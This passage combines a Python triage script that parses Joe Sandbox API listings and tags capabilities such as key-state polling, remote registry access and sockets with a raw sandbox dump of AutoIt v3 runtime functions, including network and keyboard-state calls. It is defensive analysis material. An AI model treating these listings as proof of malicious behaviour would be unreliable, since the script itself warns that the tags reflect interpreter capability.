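# "•" bullets, "ref:" and "Part of subcall function" wording are as on the page);
# abridged copies of three entries from the process-6 dump based at 0x6F0000.
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 007721BA
• WSAGetLastError.WSOCK32 ref: 007721E1
• bind.WSOCK32(00000000,?,00000010), ref: 00772238
  • Part of subcall function 007739AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 007739D7
• Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
APIs
• GetKeyboardState.USER32(?), ref: 0075A572
• GetAsyncKeyState.USER32(000000A0), ref: 0075A5F3
• GetKeyState.USER32(00000011), ref: 0075A667
• API ID: State$Async$Keyboard
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0077C89D
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0077C98B
• API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
"""

# One call bullet: optional subcall prefix, Api.MODULE, optional (args), "ref: ADDR".
API_LINE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
                      r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?"
                      r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
KV_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")  # "• API ID: ..."
OFFSET_RE = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")

ApiCall = namedtuple("ApiCall", "api module args ref subcall_of")  # subcall_of: callee addr or None

@dataclass
class FunctionEntry:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

def parse_entries(text):
    """Split the listing at each 'APIs' header; collect call bullets and metadata bullets."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
        elif cur is not None:
            if m := API_LINE.match(line):
                args = tuple(a.strip() for a in m["args"].split(",")) if m["args"] else ()
                cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                         int(m["sub"], 16) if m["sub"] else None))
            elif m := KV_LINE.match(line):
                cur.meta[m["key"]] = m["val"].strip()
    return entries

# Any one of these APIs earns the tag; ALL_OF needs the full set (a lone closesocket is not a bind).
ANY_OF = {"file_enumeration": {"FindFirstFileW", "FindNextFileW"}, "file_deletion": {"DeleteFileW"},
          "registry_query": {"RegOpenKeyExW", "RegQueryValueExW"}, "remote_registry": {"RegConnectRegistryW"},
          "key_state_polling": {"GetAsyncKeyState", "GetKeyState", "GetKeyboardState"},
          "input_injection": {"mouse_event"}, "com_instantiation": {"CoCreateInstance"}}
ALL_OF = {"winsock_bind": {"socket", "bind"}}
AF_INET, SOCK_DGRAM, IPPROTO_UDP = 2, 2, 17   # Winsock constants for decoding socket() args

def tag_capabilities(entry, include_subcalls=False):
    """Direct calls only by default, so a callee's behaviour is not credited to every caller."""
    names = {c.api for c in entry.calls if include_subcalls or c.subcall_of is None}
    tags = {t for t, s in ANY_OF.items() if s & names} | {t for t, s in ALL_OF.items() if s <= names}
    for c in entry.calls:
        if c.api == "socket" and len(c.args) >= 3 and "?" not in c.args[:3]:
            af, typ, proto = (int(a, 16) for a in c.args[:3])
            if (af, typ, proto) == (AF_INET, SOCK_DGRAM, IPPROTO_UDP):
                tags.add("udp_socket")
    return tags

VK_NAMES = {0x01: "VK_LBUTTON", 0x02: "VK_RBUTTON", 0x11: "VK_CONTROL", 0x12: "VK_MENU",
            0x5B: "VK_LWIN", 0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT"}

def polled_keys(entry):
    """Virtual-key names passed as literal constants to GetKeyState/GetAsyncKeyState."""
    keys = set()
    for c in entry.calls:
        if c.api in ("GetKeyState", "GetAsyncKeyState") and c.args and c.args[0] != "?":
            vk = int(c.args[0], 16)
            keys.add(VK_NAMES.get(vk, f"VK_0x{vk:02X}"))
    return sorted(keys)

def triage(text):
    """One row per function. Caveat: this dump is the AutoIt v3 runtime, so a tag is interpreter capability."""
    rows = []
    for e in parse_entries(text):
        refs = [c.ref for c in e.calls if c.subcall_of is None]
        base = OFFSET_RE.search(e.meta.get("Source File", ""))
        rows.append({"api_id": e.meta.get("API ID", ""), "base": int(base.group(1), 16) if base else None,
                     "first_ref": min(refs) if refs else None,
                     "tags": sorted(tag_capabilities(e)), "keys": polled_keys(e)})
    return rows
```

Run triage() over a whole report section pasted into a file and you get one row per function with its lowest call-site address, which is the number to take back into the memory dump (the "Source File" .sdmp) when you want to inspect the function itself; pass include_subcalls=True only when you deliberately want a caller to inherit its callees' tags.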
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                        • String ID:
                                        • API String ID: 292994002-0
                                        • Opcode ID: d61fdf9ac9c1dce87e1796a76129cbdc09cd90829339cbc537789ea2105d6057
                                        • Instruction ID: 5854b5e7f99599699d2f20267f1ef3809ce70b713bb32afa13ba2629c54d2a96
                                        • Opcode Fuzzy Hash: d61fdf9ac9c1dce87e1796a76129cbdc09cd90829339cbc537789ea2105d6057
                                        • Instruction Fuzzy Hash: 7A21F7313802409FD721AF1AC854B167BE5EF95325F18806DE849CB253EB79EC43CB94
                                        APIs
                                        • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 0075EC19
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                         • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                         • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: mouse_event
                                        • String ID: DOWN
                                        • API String ID: 2434400541-711622031
                                        • Opcode ID: 989a62c96139bd67d4080b918dcf690c969c8237ee283f18fcd7b7e69efbf611
                                        • Instruction ID: dca51f9e33614e27b15cc09e5e570c0d166566da5297de83b470c2d8bc019270
                                        • Opcode Fuzzy Hash: 989a62c96139bd67d4080b918dcf690c969c8237ee283f18fcd7b7e69efbf611
                                        • Instruction Fuzzy Hash: 14E08CA62DD7223CBE4821187C07EF7038C8F22336B614246FC41E51C0ED8D5EC661B8
                                        APIs
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006F259A
                                        • GetSystemMetrics.USER32(00000007), ref: 006F25A2
                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006F25CD
                                        • GetSystemMetrics.USER32(00000008), ref: 006F25D5
                                        • GetSystemMetrics.USER32(00000004), ref: 006F25FA
                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 006F2617
                                        • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 006F2627
                                        • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 006F265A
                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 006F266E
                                        • GetClientRect.USER32(00000000,000000FF), ref: 006F268C
                                        • GetStockObject.GDI32(00000011), ref: 006F26A8
                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 006F26B3
                                          • Part of subcall function 006F19CD: GetCursorPos.USER32(?), ref: 006F19E1
                                          • Part of subcall function 006F19CD: ScreenToClient.USER32(00000000,?), ref: 006F19FE
                                          • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000001), ref: 006F1A23
                                          • Part of subcall function 006F19CD: GetAsyncKeyState.USER32(00000002), ref: 006F1A3D
                                        • SetTimer.USER32(00000000,00000000,00000028,006F199C), ref: 006F26DA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                        • String ID: AutoIt v3 GUI
                                        • API String ID: 1458621304-248962490
                                        • Opcode ID: f8fb747cc6ce1b6a61b93f0915e23da71f28c7c502370c02bf7383cbf041125d
                                        • Instruction ID: c4bea36361c813e40c3694f571df48fc98ce90893e565156ad627dd97d22133e
                                        • Opcode Fuzzy Hash: f8fb747cc6ce1b6a61b93f0915e23da71f28c7c502370c02bf7383cbf041125d
                                        • Instruction Fuzzy Hash: 16B18C71A0020ADFDB24DFA8CC59BAE3BB5FB48314F108119FA15A72D1DB78A941CF55
                                        APIs
                                        • _wcslen.LIBCMT ref: 00788CB9
                                        • _wcslen.LIBCMT ref: 00788CCD
                                        • _wcslen.LIBCMT ref: 00788CF0
                                        • _wcslen.LIBCMT ref: 00788D13
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00788D51
                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00783F79,?), ref: 00788DAD
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00788DE6
                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00788E29
                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00788E60
                                        • FreeLibrary.KERNEL32(?), ref: 00788E6C
                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00788E7C
                                        • DestroyIcon.USER32(?), ref: 00788E8B
                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00788EA8
                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00788EB4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                        • String ID: .dll$.exe$.icl$y?x
                                        • API String ID: 799131459-1772520864
                                        • Opcode ID: 6a291a61bae350c9aba540ca3535705993cf2017f6efa4981575b0242accf3fe
                                        • Instruction ID: 29207d7b8fc8c365b85fc315f7d9c1ef7f5538e794ee10626eb7759a729d93f3
                                        • Opcode Fuzzy Hash: 6a291a61bae350c9aba540ca3535705993cf2017f6efa4981575b0242accf3fe
                                        • Instruction Fuzzy Hash: 0D61CF71680219FEEB64EF64DC45BBE77A8BB08710F508606F915D61D1DB789E80CBA0
                                        APIs
                                        • CharLowerBuffW.USER32(?,?), ref: 00764852
                                        • _wcslen.LIBCMT ref: 0076485D
                                        • _wcslen.LIBCMT ref: 007648B4
                                        • _wcslen.LIBCMT ref: 007648F2
                                        • GetDriveTypeW.KERNEL32(?), ref: 00764930
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00764978
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007649B3
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007649E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: SendString_wcslen$BuffCharDriveLowerType
                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                        • API String ID: 1839972693-4113822522
                                        • Opcode ID: 9d22ffeff64f5d7304a44ee010625604d490b8650f5d8a2cb41f4149e293772b
                                        • Instruction ID: e41e725464653b38aa9a7278d00ad54bb0804b9631e32ca2e3238fd2987ba297
                                        • Opcode Fuzzy Hash: 9d22ffeff64f5d7304a44ee010625604d490b8650f5d8a2cb41f4149e293772b
                                        • Instruction Fuzzy Hash: 4471D0725083069FC750EF28C8809BBBBE5EF94754F10492CF896972A1EB38ED45CB95
                                        APIs
                                        • LoadIconW.USER32(00000063), ref: 007562BD
                                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 007562CF
                                        • SetWindowTextW.USER32(?,?), ref: 007562E6
                                        • GetDlgItem.USER32(?,000003EA), ref: 007562FB
                                        • SetWindowTextW.USER32(00000000,?), ref: 00756301
                                        • GetDlgItem.USER32(?,000003E9), ref: 00756311
                                        • SetWindowTextW.USER32(00000000,?), ref: 00756317
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00756338
                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00756352
                                        • GetWindowRect.USER32(?,?), ref: 0075635B
                                        • _wcslen.LIBCMT ref: 007563C2
                                        • SetWindowTextW.USER32(?,?), ref: 007563FE
                                        • GetDesktopWindow.USER32 ref: 00756404
                                        • GetWindowRect.USER32(00000000), ref: 0075640B
                                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00756462
                                        • GetClientRect.USER32(?,?), ref: 0075646F
                                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00756494
                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 007564BE
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                        • String ID:
                                        • API String ID: 895679908-0
                                        • Opcode ID: a268f93713115ce19d319fa9480dec7ec2ccb74da9f813c11ca7956039a28f5f
                                        • Instruction ID: 6d8fd5bbd88f478ab63890d8758643c48b6b2e83dfca47b8ad51d24d36c7ffaa
                                        • Opcode Fuzzy Hash: a268f93713115ce19d319fa9480dec7ec2ccb74da9f813c11ca7956039a28f5f
                                        • Instruction Fuzzy Hash: 15718D31A00709AFDB20DFA8CE49AAEBBF5FF48705F504518E946A31A0D7B8ED45CB50
                                        APIs
                                        • LoadCursorW.USER32(00000000,00007F89), ref: 00770784
                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 0077078F
                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0077079A
                                        • LoadCursorW.USER32(00000000,00007F03), ref: 007707A5
                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 007707B0
                                        • LoadCursorW.USER32(00000000,00007F01), ref: 007707BB
                                        • LoadCursorW.USER32(00000000,00007F81), ref: 007707C6
                                        • LoadCursorW.USER32(00000000,00007F88), ref: 007707D1
                                        • LoadCursorW.USER32(00000000,00007F80), ref: 007707DC
                                        • LoadCursorW.USER32(00000000,00007F86), ref: 007707E7
                                        • LoadCursorW.USER32(00000000,00007F83), ref: 007707F2
                                        • LoadCursorW.USER32(00000000,00007F85), ref: 007707FD
                                        • LoadCursorW.USER32(00000000,00007F82), ref: 00770808
                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00770813
                                        • LoadCursorW.USER32(00000000,00007F04), ref: 0077081E
                                        • LoadCursorW.USER32(00000000,00007F02), ref: 00770829
                                        • GetCursorInfo.USER32(?), ref: 00770839
                                        • GetLastError.KERNEL32 ref: 0077087B
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Cursor$Load$ErrorInfoLast
                                        • String ID:
                                        • API String ID: 3215588206-0
                                        • Opcode ID: 94da389823d3c954e74ee4c6a16dcb2e193dcc701765061eb42146df6f3ec161
                                        • Instruction ID: 2ae627c3bbdf51d539e10fa898d012230ef07410cab250b78f4791ebf9f58834
                                        • Opcode Fuzzy Hash: 94da389823d3c954e74ee4c6a16dcb2e193dcc701765061eb42146df6f3ec161
                                        • Instruction Fuzzy Hash: 6B4177B0D48319AADB10DFBA8C8586EBFE8FF04354B50852AE11CE7291D778E901CF91
                                        APIs
                                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00710456
                                          • Part of subcall function 0071047D: InitializeCriticalSectionAndSpinCount.KERNEL32(007C170C,00000FA0,CCB2BAFC,?,?,?,?,00732753,000000FF), ref: 007104AC
                                          • Part of subcall function 0071047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00732753,000000FF), ref: 007104B7
                                          • Part of subcall function 0071047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00732753,000000FF), ref: 007104C8
                                          • Part of subcall function 0071047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 007104DE
                                          • Part of subcall function 0071047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 007104EC
                                          • Part of subcall function 0071047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 007104FA
                                          • Part of subcall function 0071047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00710525
                                          • Part of subcall function 0071047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00710530
                                        • ___scrt_fastfail.LIBCMT ref: 00710477
                                          • Part of subcall function 00710433: __onexit.LIBCMT ref: 00710439
                                        Strings
                                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 007104B2
                                        • kernel32.dll, xrefs: 007104C3
                                        • InitializeConditionVariable, xrefs: 007104D8
                                        • SleepConditionVariableCS, xrefs: 007104E4
                                        • WakeAllConditionVariable, xrefs: 007104F2
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                        • API String ID: 66158676-1714406822
                                        • Opcode ID: a1c8f977c27e1a26ba8adfc85633622bd1de440db0bd3429cf6c5105a99c7376
                                        • Instruction ID: 6a314d2bb336dc52f42417910503554dd0fa445078efba8d664f9796fa3ebd2d
                                        • Opcode Fuzzy Hash: a1c8f977c27e1a26ba8adfc85633622bd1de440db0bd3429cf6c5105a99c7376
                                        • Instruction Fuzzy Hash: A921D772A84754AFD7206BACAC4DFA937A5EF05F61F114129F901962D0DBEC9CC08BD4
                                        APIs
                                        • CharLowerBuffW.USER32(00000000,00000000,0078DCD0), ref: 00764E81
                                        • _wcslen.LIBCMT ref: 00764E95
                                        • _wcslen.LIBCMT ref: 00764EF3
                                        • _wcslen.LIBCMT ref: 00764F4E
                                        • _wcslen.LIBCMT ref: 00764F99
                                        • _wcslen.LIBCMT ref: 00765001
                                          • Part of subcall function 0070FD60: _wcslen.LIBCMT ref: 0070FD6B
                                        • GetDriveTypeW.KERNEL32(?,007B7C10,00000061), ref: 0076509D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: _wcslen$BuffCharDriveLowerType
                                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                        • API String ID: 2055661098-1000479233
                                        • Opcode ID: 70b10b4c4a21a87e999de7685cf586c39aa605da5ddcdb0edc5057cc3b6130fc
                                        • Instruction ID: 5df922110ff9152082d89cab6e0d2fe31fe5e393b564669716898c75373db980
                                        • Opcode Fuzzy Hash: 70b10b4c4a21a87e999de7685cf586c39aa605da5ddcdb0edc5057cc3b6130fc
                                        • Instruction Fuzzy Hash: AFB1F2316087029FC714DF28C990ABAB7E5FFA5720F14491DF99687292DB38DC44CBA2
                                        APIs
                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0078DCD0), ref: 00774A18
                                        • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00774A2A
                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0078DCD0), ref: 00774A4F
                                        • FreeLibrary.KERNEL32(00000000,?,0078DCD0), ref: 00774A9B
                                        • StringFromGUID2.OLE32(?,?,00000028,?,0078DCD0), ref: 00774B05
                                        • SysFreeString.OLEAUT32(00000009), ref: 00774BBF
                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00774C25
                                        • SysFreeString.OLEAUT32(?), ref: 00774C4F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                        • String ID: GetModuleHandleExW$kernel32.dll
                                        • API String ID: 354098117-199464113
                                        • Opcode ID: ddda31a148f7983517629d22bbebb0d5d8cecfe29e3db7ec68415cbd03ce30f2
                                        • Instruction ID: 8b3cea102d91e066fb9201e972c0ac5688ad54f20f9be3a0c6bd221958453e02
                                        • Opcode Fuzzy Hash: ddda31a148f7983517629d22bbebb0d5d8cecfe29e3db7ec68415cbd03ce30f2
                                        • Instruction Fuzzy Hash: E7122A71A00109EFDF14CF94C888EAAB7B9FF45354F25C098E909AB261D775ED42CBA0
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0076CE0D
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0076CE20
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0076CE34
                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0076CE4D
                                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0076CE90
                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0076CEA6
                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0076CEB1
                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0076CEE1
                                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0076CF39
                                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0076CF4D
                                        • InternetCloseHandle.WININET(00000000), ref: 0076CF58
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1901257388.00000000006F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 006F0000, based on PE: true
                                        • Associated: 00000006.00000002.1901241890.00000000006F0000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.000000000078D000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901305228.00000000007B3000.00000002.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901342671.00000000007BD000.00000004.00000001.01000000.0000000A.sdmp
                                        • Associated: 00000006.00000002.1901359101.00000000007C5000.00000002.00000001.01000000.0000000A.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_6f0000_cipkucw.jbxd
                                        Similarity
                                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                        • String ID:
                                        • API String ID: 3800310941-3916222277
                                        • Opcode ID: 0f1a77b887c47c85993c72d233f4d1270afb9ee49268e73d655ba44f663a2fe9
                                        • Instruction ID: 8324ef989d707b9cf5cece5bd681cf8104d33f7c76d819a05f55394fd5714cda
